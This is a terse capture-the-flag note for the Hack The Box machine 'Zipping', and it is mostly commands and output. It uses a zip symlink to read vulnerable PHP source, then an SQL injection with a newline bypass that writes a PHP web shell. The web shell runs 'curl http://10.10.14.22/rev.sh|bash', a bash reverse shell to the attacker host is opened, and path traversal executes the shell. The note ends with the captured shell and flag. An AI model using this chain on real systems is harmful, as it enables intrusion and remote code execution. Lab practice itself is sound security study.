HTB-Zipping笔记-新get shell

ln -s /var/www/html/shop/product.php lol.pdfzip --symlink lol.zip lol.pdf

<?php// Check to make sure the id parameter is specified in the URLif (isset($_GET['id'])) {    $id = $_GET['id'];    // Filtering user input for letters or special characters    if(preg_match("/^.*[A-Za-z!#$%^&*()-_=+{}[]\|;:'",.<>/?]|[^0-9]$/", $id, $match)) {        header('Location: index.php');    } else {        // Prepare statement and execute, but does not prevent SQL injection        $stmt = $pdo->prepare("SELECT * FROM products WHERE id = '$id'");        $stmt->execute();        // Fetch the product from the database and return the result as an Array        $product = $stmt->fetch(PDO::FETCH_ASSOC);        // Check if the product exists (array is not empty)        if (!$product) {            // Simple error to display if the id for the product doesn't exists (array is empty)            exit('Product does not exist!');        }    }} else {    // Simple error to display if the id wasn't specified    exit('No ID provided!');}?>
<?=template_header('Zipping | Product')?>
<div class="product content-wrapper">    <img src="assets/imgs/<?=$product['img']?>" width="500" height="500" alt="<?=$product['name']?>">    <div>        <h1 class="name"><?=$product['name']?></h1>        <span class="price">            &dollar;<?=$product['price']?>            <?php if ($product['rrp'] > 0): ?>            <span class="rrp">&dollar;<?=$product['rrp']?></span>            <?php endif; ?>        </span>        <form action="index.php?page=cart" method="post">            <input type="number" name="quantity" value="1" min="1" max="<?=$product['quantity']?>" placeholder="Quantity" required>            <input type="hidden" name="product_id" value="<?=$product['id']?>">            <input type="submit" value="Add To Cart">        </form>        <div class="description">            <?=$product['desc']?>        </div>    </div></div>
<?=template_footer()?>

echo "bash -c 'bash -i >& /dev/tcp/10.10.14.22/4444 0>&1'" > rev.shpython3 -m http.server 80nc -lvnp 4444

curl -s $'http://zipping.htb/shop/index.php?page=product&id=%0A'%3bselect+'<%3fphp+system("curl+http%3a//10.10.14.22/rev.sh|bash")%3b%3f>'+into+outfile+'/var/lib/mysql/breached.php'+%231'curl -s $'http://zipping.htb/shop/index.php?page=..%2f..%2f..%2f..%2f..%2fvar%2flib%2fmysql%2fbreached'

# nc -lvnp 4444listening on [any] 4444 ...connect to [10.10.14.22] from (UNKNOWN) [10.10.11.229] 36748bash: cannot set terminal process group (1125): Inappropriate ioctl for devicebash: no job control in this shellrektsu@zipping:/var/www/html/shop$ ididuid=1001(rektsu) gid=1001(rektsu) groups=1001(rektsu)rektsu@zipping:/var/www/html/shop$ datadatabash: data: command not foundrektsu@zipping:/var/www/html/shop$ time    time
real    0m0.000suser    0m0.000ssys     0m0.000srektsu@zipping:/var/www/html/shop$ datadatabash: data: command not foundrektsu@zipping:/var/www/html/shop$ cat /home/rektsu/user.txtcat /home/rektsu/user.txtc41c61d3d2252776ca84fd7d1a29b466rektsu@zipping:/var/www/html/shop$